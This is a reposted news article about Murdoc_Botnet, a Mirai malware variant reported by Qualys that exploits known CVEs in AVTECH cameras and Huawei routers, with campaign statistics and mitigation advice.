New Mirai Malware Variant Targets AVTECH Cameras, Huawei Routers

by admin 0 Comments

Security
Share on Facebook
Share on Twitter
Share on Pinterest
Share on LinkedIn
Share on Facebook
Share on Twitter
Share on Pinterest
Share on LinkedIn

A significant botnet campaign leveraging a new variant of the infamous Mirai malware, dubbed Murdoc_Botnet, has been observed targeting AVTECH cameras and Huawei HG532 routers, exploiting known vulnerabilities to infect devices and establish a vast network for malicious activities.

Identified by researchers at Qualys, the Murdoc_Botnet campaign uses exploits such as CVE-2024-7029 and CVE-2017-17215 to breach devices and deploy payloads.

Once compromised, devices are enrolled in the botnet and are capable of executing large-scale distributed denial-of-service (DDoS) attacks. 

“[This variant] demonstrates enhanced capabilities, exploiting vulnerabilities to compromise devices and establish expansive botnet networks,” Qualys explained.

The security analysts traced the campaign back to July 2024, identifying over 1300 active IPs involved in its propagation.

How the Malware Spreads

The malware uses shell scripts and ELF binaries to infiltrate systems. Attackers initiate infections by exploiting device vulnerabilities to download and execute payloads. These scripts fetch malware files, grant them execution rights and remove traces of the installation process.

Qualys examined more than 500 samples, revealing consistent infection mechanisms and targets, primarily IoT devices like IP cameras and network routers.

Global Reach and Detection

The campaign has had a significant impact in Malaysia, Thailand, Mexico and Indonesia.

Qualys reported more than 100 command-and-control servers coordinating the botnet’s activities. The company’s Endpoint Detection and Response (EDR) solution has successfully identified multiple instances of this malware.

Read more on how botnets compromise IoT device security: New Mirai Botnet Exploits Zero-Days in Routers and Smart Devices

To mitigate risks, Qualys advised:

  • Monitoring unusual processes and network activities from untrusted sources

  • Avoiding the execution of unknown shell scripts

  • Keeping devices updated with the latest firmware and security patches

Murdoc_Botnet represents an evolution of the Mirai malware family, demonstrating the growing sophistication of IoT-targeted cyber threats. Security professionals must remain vigilant and employ the tactics above, as well as advanced tools to defend against these campaigns.

This article was originally published by Infosecurity-magazine.com. Read the original article here.
Share on Facebook
Share on Twitter
Share on Pinterest
Share on LinkedIn

Products You May Like

Articles You May Like

Russian Star Blizzard Shifts Tactics to Exploit WhatsApp QR Codes for Credential Harvesting
Middle Eastern Real Estate Fraud Grows with Online Listings
HPE Launches Investigation After Hacker Claims Data Breach
Critical Flaws in WGS-804HPT Switches Enable RCE and Network Exploitation
TikTok Goes Dark in the U.S. as Federal Ban Takes Effect January 19, 2025

Leave a Reply

Your email address will not be published. Required fields are marked *